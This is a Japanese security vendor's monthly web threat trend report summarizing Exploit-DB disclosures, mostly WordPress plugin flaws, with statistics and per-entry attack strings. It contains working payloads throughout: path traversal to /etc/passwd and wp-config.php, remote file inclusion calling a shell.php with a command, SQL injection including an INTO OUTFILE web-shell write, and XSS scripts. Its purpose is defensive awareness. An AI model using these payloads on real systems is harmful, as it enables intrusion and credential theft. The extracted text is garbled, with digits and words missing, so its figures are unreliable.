最新 Web トレンドレポート (06.03) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

06.03

最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3 月に公開された Exploit-DB の分析結果 Local File Inclusion 攻撃に対する報告数が最も多かったです Local File Inclusion 攻撃は 主に Directory Traversal 攻撃と共に行われる攻撃として対象ファイルが攻撃対象サーバーに位置しているとき 発生します Local File Inclusion 攻撃は パラメーター値の経路を単純操作する形態の簡単な攻撃です 当該攻撃は システムファイルがユーザに露出される被害を起こすため 難易度に比べて危険度が高いです Local File Inclusion 攻撃を予防するための最も良い方法は ソースコードを安全に修正することです しかし サイトの規模が大きくて該当サーバーのすべての入力値を検証しにくい状況なら Web アプリケーションファイアウォールを導入するのが現実的に適切な方法です 主なソフトウェア別発生現状から見れば Open Source CMS として広く知られている で最も多いが報告されました 分析された は 自体のというよりは主に新規 Plugin のでした を使用する管理者は 使用中の Plguin のセキュリティパッチを実施して サーバーがにさらされないように注意しなければなりません. 別件数カテゴリコード インジェクション (Code Injection) ファイルアップロード (File Upload) SQL インジェクション (SQL Injection) RFIリモートファイル挿入 (Remote File Inclusion:RFI) クロスサイトスクリプティング (Cross Site Scripting : XSS) 件数 4 4 0 ローカルファイル挿入 (Local File Inclusion:LFI) 3 合計 33 別件数 4 4 0 3 33 35 30 5 0 5 0 5 0. 危険度別件数 危険度 件数 割合 早急対応要 6 8% 高 7 8% 合計 33 00% 危険度別分類 6 早急対応要 高 7 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 3 9% 中 3 9% 易 7 8% 合計 33 00% 攻撃実行の難易度別件数 3 3 7 難 中 易 4. 主なソフトウェア別発生件数ソフトウェア名 PivotX TeamPass ProjectSend CubeCart Liferay Portal itop Zenphoto Joomla Monstra 合計 件数 0 33 主なソフトウェア別発生件数 0 PivotX TeamPass ProjectSend CubeCart Liferay Portal itop Zenphoto Joomla Monstra Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす 中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン 対象のシステムの重要な情報を取得するため 高度な攻撃コードを採用したパターン 知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号 カテゴリ 攻撃難易度 危険度 名 ソフトウェア名 3953 File Upload 易 高 CP Polls Plugin.0.8 - admin.php XSS 39547 XSS 易 高 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS () 39548 XSS 易 高 WP Advanced Comment Plugin 0.0 - / XSS 39547 XSS 易 高 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS 39553 XSS 易 高 DZS Videogallery Plugin <=8.60 - popup.php XSS 39553 XSS 易 高 DZS Videogallery Plugin <=8.60 - ajax.php XSS 39558 LFI 易 高 Site Import Plugin.0. - page.php LFI 39558 RFI 易 早急対応要 Site Import Plugin.0. - page.php RFI 39584 LFI 易高 Image Export Plugin..0 - download.php LFI 39577 LFI 易 高 Abtest Plugin - abtest_admin.php LFI 39575 LFI 易 高 ebook Download Plugin. - filedownload.php LFI 39593 LFI 易高 Memphis Document Library Plugin 3..5 - / LFI 39593 LFI 易 高 Memphis Document Library Plugin 3..5 - /mdocsposts/ LFI 3959 LFI 易 高 Dharma booking Plugin.38.3 - proccess.php LFI 3959 RFI 易 高 Dharma booking Plugin.38.3 - proccess.php RFI 3959 LFI 易 高 Brandfolder Plugin 3.0 - callback.php LFI 3959 RFI 易 高 Brandfolder Plugin 3.0 - callback.php RFI 39589 LFI 易 高 HB Audio Gallery Lite Plugin.0.0 - audiodownload.php LFI 3963 LFI 易 高 Photocart Link Plugin.6 - decode.php LFI 396 LFI 易高 Plugin IMDb Profile Widget.0.8 - pic.php LFI Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号 カテゴリ 攻撃難度 危険度 名 攻撃コード 対象プログラム 対象環境 06-03-0 3953 File Upload 易 高 POST /wpadmin/admin.php?page=cp_polls&cal=&list=&import= HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT CP Polls Plugin.0.8 - CP Polls 6.; WOW64; Trident/6.0) admin.php XSS Plugin.0.8 Content-Type: multipart/form-data; boundary=-------------------- -------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="importfile"; filename="csv.csv" Content-Type: application/octet-stream 06-03-0 39547 XSS 易高 Best Web Soft Captcha /wpadmin/admin.php?page=captcha.php&action=whitelist&s=%3 Plugin <= 4..5 - admin.php XSS () Cscript%3Ealert%8%9%3B%3C%Fscript%3E Best Web Soft Captcha Plugin <= 4.. 06-03-0 39548 XSS 易高 WP Advanced Comment Plugin 0.0 - / XSS POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) WP Advanced Comment Plugin 0.0 06-03-0 39547 XSS 易高 POST /wpadmin/admin.php?page=captcha.php&action=whitelist HTTP/. Best Web Soft Captcha AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 Plugin <= 4..5 - admin.php XSS 脆 弱性 Best Web Soft Captcha Plugin <= 4.. s=<script>alert();</script>&search IP=Click here to claim your prize! 06-03- 39553 XSS 易高 DZS Videogallery Plugin <=8.60 - popup.php XSS /wp-content/plugins/dzsvideogallery/admin/playlistseditor/popup.php?initer=whatava 864%7%3balert%8%9%f%f645 DZS Videogallery Plugin <=8.6 06-03- 39553 XSS 易高 DZS Videogallery Plugin <=8.60 - ajax.php XSS /wp-content/plugins/dzsvideogallery/ajax.php?height=&source=6d7f"><script>alert() <%fscript>894ba&type=&width= DZS Videogallery Plugin <=8.6 06-03-4 39558 LFI 易高 Site Import Plugin.0. - page.php LFI /wp-content/plugins/siteimport/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini Site Import Plugin.0. 06-03-4 39558 RFI 易早急対応要 Site Import Plugin.0. - page.php RFI /wp-content/plugins/siteimport/admin/page.php?url=http%3a%f%flocalhost%fsh ell.php?shell=ls Site Import Plugin.0. Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-03-4 39559 SQL Injection 難早急対応要 TeamPass..4 - item.query.php SQL Injection POST /source/item.query.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 TeamPass TeamPass.. 06-03-4 39559 SQL Injection 難早急対応要 TeamPass..4 - view.query.php SQL Injection type=action_on_quick_icon&id=(select (CASE WHEN (644=644) THEN 644 ELSE 644*(SELECT 644 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action= POST /source/view.query.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 TeamPass TeamPass.. type=connections_logs&order=(select (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC POST /monstra-3.0.3/users/8/edit HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 06-03-6 39567 XSS 易高 Monstra CMS 3.0.3 - /monstra- 3.0.3/users/8/edit XSS csrf=685bba70d44b8b877937b56f5b87e66935fe&user_i d=8&login=user&firstname=%%3e%3cscript%3ealert%8 %9%3B%3C%Fscript%3E&lastname=%%3E%3Cscrip t%3ealert%8%9%3b%3c%fscript%3e&email=%% 3E%3Cscript%3Ealert%8%9%3B%3C%Fscript%3E&tw itter=%%3e%3cscript%3ealert%8%9%3b%3c%fsc ript%3e&skype=%%3e%3cscript%3ealert%8%9%3b %3C%Fscript%3E&about_me=%%3E%3Cscript%3Ealert %8%9%3B%3C%Fscript%3E&new_password=&edit_pr ofile=save Monstra Monstra CMS 3.0. 06-03-7 3957 RFI 易高 Zenphoto.4. - admin-logs.php RFI /zp-core/adminlogs.php?action=download_log&page=logs&tab=http://localho st/shell.php%3f%78%3d%69%64%6%66%6f%6f%3d&fil ename=security&xsrftoken=afd5bafed79d837486fdbee a8f87bc9dea Zenphoto Zenphoto.4. 06-03-7 3957 LFI 中高 PivotX.3. - index.php LFI /pivotx_latest/pivotx/index.php?page=media&del=...//...//.../ /...//...//...//...//...//...//...//...//...//important/important.file &pivotxsession=ovyyn4objc5ym9 PivotX PivotX.3. 06-03-7 3957 LFI 中早急対応要 PivotX.3. - ajaxhelper.php LFI /pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=l 3Zhci93d3cvcGlb3R4XxhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//...//...//...//...//...//...//...//...//...//...//etc/passwd PivotX PivotX.3. 06-03- 39588 XSS 易高 06-03- 39588 XSS 易高 06-03- 39587 Code Injection 中早急対応要 ProjectSend r58 - index.php XSS ProjectSend r58 - clients.php XSS itop.. - config.php Code Injection POST /my_files/index.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 POST /clients.php HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 POST /env-production/itopconfig/config.php?c%5bmenu%5d=configeditor HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 ProjectSend ProjectSend r58 ProjectSend ProjectSend r58 itop itop.. Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-03- 39584 LFI 易高 Image Export Plugin..0 - download.php LFI /wp-content/plugins/imageexport/download.php?file=../../../wp-config.php Image Export Plugin..0 06-03- 39577 LFI 易高 Abtest Plugin - abtest_admin.php LFI /wpcontent/plugins/abtest/abtest_admin.php?action=../../etc/pass wd Abtest Plugin 06-03- 39575 LFI 易高 ebook Download Plugin. - filedownload.php LFI /wp-content/plugins/ebookdownload/filedownload.php?ebookdownloadurl=../../../wpconfig.php ebook Download Plugin. 06-03- 39593 LFI 易高 Memphis Document Library Plugin 3..5 - / LFI /?mdocs-img-preview=../../../wp-config.php Memphis Document Library Plugin 3..5 06-03- 39593 LFI 易高 Memphis Document Library Plugin 3..5 - /mdocs-posts/ /mdocs-posts/?mdocs-img-preview=../../../wp-config.php LFI Memphis Document Library Plugin 3..5 06-03- 3959 LFI 易高 Dharma booking Plugin.38.3 - proccess.php LFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?gateway=../../.. /../../../etc/passwd%00 Dharma booking Plugin.38.3 06-03- 3959 RFI 易高 Dharma booking Plugin.38.3 - proccess.php RFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?gateway=http:/ /www.example.com/index.php Dharma booking Plugin.38.3 06-03- 3959 LFI 易高 Brandfolder Plugin 3.0 - callback.php LFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abspath=../../../ wp-config.php%00 Brandfolder Plugin 3.0 06-03- 3959 RFI 易高 Brandfolder Plugin 3.0 - callback.php RFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abspath=http:// www.example.com/index.php Brandfolder Plugin 3.0 06-03- 39590 SQL Injection 易高 06-03- 39589 LFI 易高 Joomla Easy Youtube Gallery.0. - index.php SQL Injection /index.php?option=com_easy_youtube_gallery&view=videos& mycategory=0%7%0or%0%7%7=%7%7&defaul tvideo=9&itemid=75 HB Audio Gallery Lite /wp-content/plugins/hb-audio-gallery-lite/gallery/audiodownload.php?file_path=../../../../wp-config.php&file_size=0 Plugin.0.0 - audio-download.php LFI Joomla Joomla Easy Youtube Gallery.0. HB Audio Gallery Lite Plugin.0.0 Copyright 06 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 4456 3963 LFI 易高 Photocart Link Plugin.6 - decode.php LFI /wp-content/plugins/photocartlink/decode.php?id=li4vli4vli4vd3aty9uzmlnlnboca== Photocart Link Plugin.6 06-03-7 396 LFI 易 高 06-03-8 3966 XSS 易 高 06-03-30 39637 SQL Injection 難 早急対応要 06-03-30 39637 XSS 易 高 Plugin IMDb Profile Widget.0.8 - pic.php LFI Liferay Portal 5.. - /user/test/home XSS CubeCart 6.0.0 - admin.php SQL Injection CubeCart 6.0.0 - index.php XSS /wp-content/plugins/imdb-widget/pic.php?url=../../../wpconfig.php POST /user/test/home?p_p_id=79&p_p_lifecycle=&p_p_state=maxi mized&p_p_mode=view&_79_struts_action=%fenterprise_ad min%fedit_user HTTP/. /admin.php?_g=products&cat_id=&sort[updated]=desc&cha r=t]%7%0union%0select%0,,3,4,5,6,7,8,9,'<? phpinfo();?>',,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8%0i NTO%0OUT FILE%0'/var/www/site/file.php'%0--%0 POST /index.php?_a=profile HTTP/. AppleWebKit/535.7 KHTML, like Gecko Chrome/6.0.9.75 first_name=" onmouseover="javascript:alert(/immuniweb/);" Plugin IMDb Profile Widget.0.8 Liferay Portal Liferay Portal 5.. CubeCart CubeCart 6.0.0 CubeCart CubeCart 6.0.0 Copyright 06 Penta Security Systems Inc. All rights reserved